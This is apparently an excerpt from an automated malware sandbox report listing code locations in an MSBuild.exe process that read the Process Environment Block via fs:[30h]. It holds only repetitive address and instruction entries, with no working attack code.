Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B262C mov eax, dword ptr fs:[00000030h]	9_2_018B262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE627 mov eax, dword ptr fs:[00000030h]	9_2_018CE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E6620 mov eax, dword ptr fs:[00000030h]	9_2_018E6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E8620 mov eax, dword ptr fs:[00000030h]	9_2_018E8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CC640 mov eax, dword ptr fs:[00000030h]	9_2_018CC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C266C mov eax, dword ptr fs:[00000030h]	9_2_018C266C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA660 mov eax, dword ptr fs:[00000030h]	9_2_018EA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA660 mov eax, dword ptr fs:[00000030h]	9_2_018EA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E2674 mov eax, dword ptr fs:[00000030h]	9_2_018E2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019389B3 mov esi, dword ptr fs:[00000030h]	9_2_019389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019389B3 mov eax, dword ptr fs:[00000030h]	9_2_019389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019389B3 mov eax, dword ptr fs:[00000030h]	9_2_019389B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B09AD mov eax, dword ptr fs:[00000030h]	9_2_018B09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B09AD mov eax, dword ptr fs:[00000030h]	9_2_018B09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA9D0 mov eax, dword ptr fs:[00000030h]	9_2_018BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA9D0 mov eax, dword ptr fs:[00000030h]	9_2_018BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA9D0 mov eax, dword ptr fs:[00000030h]	9_2_018BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA9D0 mov eax, dword ptr fs:[00000030h]	9_2_018BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA9D0 mov eax, dword ptr fs:[00000030h]	9_2_018BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA9D0 mov eax, dword ptr fs:[00000030h]	9_2_018BA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E49D0 mov eax, dword ptr fs:[00000030h]	9_2_018E49D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193E9E0 mov eax, dword ptr fs:[00000030h]	9_2_0193E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E29F9 mov eax, dword ptr fs:[00000030h]	9_2_018E29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E29F9 mov eax, dword ptr fs:[00000030h]	9_2_018E29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193C912 mov eax, dword ptr fs:[00000030h]	9_2_0193C912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8918 mov eax, dword ptr fs:[00000030h]	9_2_018A8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8918 mov eax, dword ptr fs:[00000030h]	9_2_018A8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E908 mov eax, dword ptr fs:[00000030h]	9_2_0192E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E908 mov eax, dword ptr fs:[00000030h]	9_2_0192E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193892A mov eax, dword ptr fs:[00000030h]	9_2_0193892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01930946 mov eax, dword ptr fs:[00000030h]	9_2_01930946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA950 mov eax, dword ptr fs:[00000030h]	9_2_018EA950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F096E mov eax, dword ptr fs:[00000030h]	9_2_018F096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F096E mov edx, dword ptr fs:[00000030h]	9_2_018F096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F096E mov eax, dword ptr fs:[00000030h]	9_2_018F096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193C97C mov eax, dword ptr fs:[00000030h]	9_2_0193C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D6962 mov eax, dword ptr fs:[00000030h]	9_2_018D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D6962 mov eax, dword ptr fs:[00000030h]	9_2_018D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D6962 mov eax, dword ptr fs:[00000030h]	9_2_018D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0887 mov eax, dword ptr fs:[00000030h]	9_2_018B0887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193C89D mov eax, dword ptr fs:[00000030h]	9_2_0193C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE8C0 mov eax, dword ptr fs:[00000030h]	9_2_018DE8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C28D0 mov ecx, dword ptr fs:[00000030h]	9_2_018C28D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC8F9 mov eax, dword ptr fs:[00000030h]	9_2_018EC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC8F9 mov eax, dword ptr fs:[00000030h]	9_2_018EC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B28F0 mov eax, dword ptr fs:[00000030h]	9_2_018B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B28F0 mov eax, dword ptr fs:[00000030h]	9_2_018B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B28F0 mov eax, dword ptr fs:[00000030h]	9_2_018B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B28F0 mov eax, dword ptr fs:[00000030h]	9_2_018B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B28F0 mov eax, dword ptr fs:[00000030h]	9_2_018B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B28F0 mov eax, dword ptr fs:[00000030h]	9_2_018B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193C810 mov eax, dword ptr fs:[00000030h]	9_2_0193C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D2835 mov eax, dword ptr fs:[00000030h]	9_2_018D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D2835 mov eax, dword ptr fs:[00000030h]	9_2_018D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D2835 mov eax, dword ptr fs:[00000030h]	9_2_018D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D2835 mov ecx, dword ptr fs:[00000030h]	9_2_018D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D2835 mov eax, dword ptr fs:[00000030h]	9_2_018D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D2835 mov eax, dword ptr fs:[00000030h]	9_2_018D2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA830 mov eax, dword ptr fs:[00000030h]	9_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B4859 mov eax, dword ptr fs:[00000030h]	9_2_018B4859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B4859 mov eax, dword ptr fs:[00000030h]	9_2_018B4859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E0854 mov eax, dword ptr fs:[00000030h]	9_2_018E0854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193E872 mov eax, dword ptr fs:[00000030h]	9_2_0193E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193E872 mov eax, dword ptr fs:[00000030h]	9_2_0193E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0BBE mov eax, dword ptr fs:[00000030h]	9_2_018C0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0BBE mov eax, dword ptr fs:[00000030h]	9_2_018C0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0BCD mov eax, dword ptr fs:[00000030h]	9_2_018B0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0BCD mov eax, dword ptr fs:[00000030h]	9_2_018B0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0BCD mov eax, dword ptr fs:[00000030h]	9_2_018B0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193CBF0 mov eax, dword ptr fs:[00000030h]	9_2_0193CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01912BF6 mov eax, dword ptr fs:[00000030h]	9_2_01912BF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DEBFC mov eax, dword ptr fs:[00000030h]	9_2_018DEBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8BF0 mov eax, dword ptr fs:[00000030h]	9_2_018B8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8BF0 mov eax, dword ptr fs:[00000030h]	9_2_018B8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8BF0 mov eax, dword ptr fs:[00000030h]	9_2_018B8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E8BF0 mov ecx, dword ptr fs:[00000030h]	9_2_018E8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E8BF0 mov eax, dword ptr fs:[00000030h]	9_2_018E8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E8BF0 mov eax, dword ptr fs:[00000030h]	9_2_018E8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192EB1D mov eax, dword ptr fs:[00000030h]	9_2_0192EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DEB20 mov eax, dword ptr fs:[00000030h]	9_2_018DEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DEB20 mov eax, dword ptr fs:[00000030h]	9_2_018DEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8B50 mov eax, dword ptr fs:[00000030h]	9_2_018A8B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ACB7E mov eax, dword ptr fs:[00000030h]	9_2_018ACB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2B79 mov eax, dword ptr fs:[00000030h]	9_2_018C2B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2B79 mov eax, dword ptr fs:[00000030h]	9_2_018C2B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2B79 mov eax, dword ptr fs:[00000030h]	9_2_018C2B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]	9_2_018AEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AEA80 mov eax, dword ptr fs:[00000030h]	9_2_018AEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80 mov eax, dword ptr fs:[00000030h]	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E8A90 mov edx, dword ptr fs:[00000030h]	9_2_018E8A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8AA0 mov eax, dword ptr fs:[00000030h]	9_2_018B8AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8AA0 mov eax, dword ptr fs:[00000030h]	9_2_018B8AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01906AA4 mov eax, dword ptr fs:[00000030h]	9_2_01906AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0AD0 mov eax, dword ptr fs:[00000030h]	9_2_018B0AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01906ACC mov eax, dword ptr fs:[00000030h]	9_2_01906ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01906ACC mov eax, dword ptr fs:[00000030h]	9_2_01906ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01906ACC mov eax, dword ptr fs:[00000030h]	9_2_01906ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E4AD0 mov eax, dword ptr fs:[00000030h]	9_2_018E4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E4AD0 mov eax, dword ptr fs:[00000030h]	9_2_018E4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EAAEE mov eax, dword ptr fs:[00000030h]	9_2_018EAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EAAEE mov eax, dword ptr fs:[00000030h]	9_2_018EAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193CA11 mov eax, dword ptr fs:[00000030h]	9_2_0193CA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8A00 mov eax, dword ptr fs:[00000030h]	9_2_018A8A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8A00 mov eax, dword ptr fs:[00000030h]	9_2_018A8A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECA24 mov eax, dword ptr fs:[00000030h]	9_2_018ECA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECA38 mov eax, dword ptr fs:[00000030h]	9_2_018ECA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D4A35 mov eax, dword ptr fs:[00000030h]	9_2_018D4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D4A35 mov eax, dword ptr fs:[00000030h]	9_2_018D4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2A45 mov eax, dword ptr fs:[00000030h]	9_2_018C2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2A45 mov eax, dword ptr fs:[00000030h]	9_2_018C2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2A45 mov eax, dword ptr fs:[00000030h]	9_2_018C2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0A5B mov eax, dword ptr fs:[00000030h]	9_2_018C0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0A5B mov eax, dword ptr fs:[00000030h]	9_2_018C0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6A50 mov eax, dword ptr fs:[00000030h]	9_2_018B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6A50 mov eax, dword ptr fs:[00000030h]	9_2_018B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6A50 mov eax, dword ptr fs:[00000030h]	9_2_018B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6A50 mov eax, dword ptr fs:[00000030h]	9_2_018B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6A50 mov eax, dword ptr fs:[00000030h]	9_2_018B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6A50 mov eax, dword ptr fs:[00000030h]	9_2_018B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6A50 mov eax, dword ptr fs:[00000030h]	9_2_018B6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E0A50 mov eax, dword ptr fs:[00000030h]	9_2_018E0A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192CA72 mov eax, dword ptr fs:[00000030h]	9_2_0192CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192CA72 mov eax, dword ptr fs:[00000030h]	9_2_0192CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECA6F mov eax, dword ptr fs:[00000030h]	9_2_018ECA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECA6F mov eax, dword ptr fs:[00000030h]	9_2_018ECA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECA6F mov eax, dword ptr fs:[00000030h]	9_2_018ECA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E6DA0 mov eax, dword ptr fs:[00000030h]	9_2_018E6DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D8DBF mov eax, dword ptr fs:[00000030h]	9_2_018D8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D8DBF mov eax, dword ptr fs:[00000030h]	9_2_018D8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECDB1 mov ecx, dword ptr fs:[00000030h]	9_2_018ECDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECDB1 mov eax, dword ptr fs:[00000030h]	9_2_018ECDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECDB1 mov eax, dword ptr fs:[00000030h]	9_2_018ECDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01934DD7 mov eax, dword ptr fs:[00000030h]	9_2_01934DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01934DD7 mov eax, dword ptr fs:[00000030h]	9_2_01934DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DEDD3 mov eax, dword ptr fs:[00000030h]	9_2_018DEDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DEDD3 mov eax, dword ptr fs:[00000030h]	9_2_018DEDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ACDEA mov eax, dword ptr fs:[00000030h]	9_2_018ACDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ACDEA mov eax, dword ptr fs:[00000030h]	9_2_018ACDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D0DE1 mov eax, dword ptr fs:[00000030h]	9_2_018D0DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DCDF0 mov eax, dword ptr fs:[00000030h]	9_2_018DCDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DCDF0 mov ecx, dword ptr fs:[00000030h]	9_2_018DCDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CAD00 mov eax, dword ptr fs:[00000030h]	9_2_018CAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CAD00 mov eax, dword ptr fs:[00000030h]	9_2_018CAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CAD00 mov eax, dword ptr fs:[00000030h]	9_2_018CAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E4D1D mov eax, dword ptr fs:[00000030h]	9_2_018E4D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A6D10 mov eax, dword ptr fs:[00000030h]	9_2_018A6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A6D10 mov eax, dword ptr fs:[00000030h]	9_2_018A6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A6D10 mov eax, dword ptr fs:[00000030h]	9_2_018A6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01938D20 mov eax, dword ptr fs:[00000030h]	9_2_01938D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0D59 mov eax, dword ptr fs:[00000030h]	9_2_018B0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0D59 mov eax, dword ptr fs:[00000030h]	9_2_018B0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0D59 mov eax, dword ptr fs:[00000030h]	9_2_018B0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8D59 mov eax, dword ptr fs:[00000030h]	9_2_018B8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8D59 mov eax, dword ptr fs:[00000030h]	9_2_018B8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8D59 mov eax, dword ptr fs:[00000030h]	9_2_018B8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8D59 mov eax, dword ptr fs:[00000030h]	9_2_018B8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8D59 mov eax, dword ptr fs:[00000030h]	9_2_018B8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8C8D mov eax, dword ptr fs:[00000030h]	9_2_018A8C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192CCA0 mov ecx, dword ptr fs:[00000030h]	9_2_0192CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192CCA0 mov eax, dword ptr fs:[00000030h]	9_2_0192CCA0
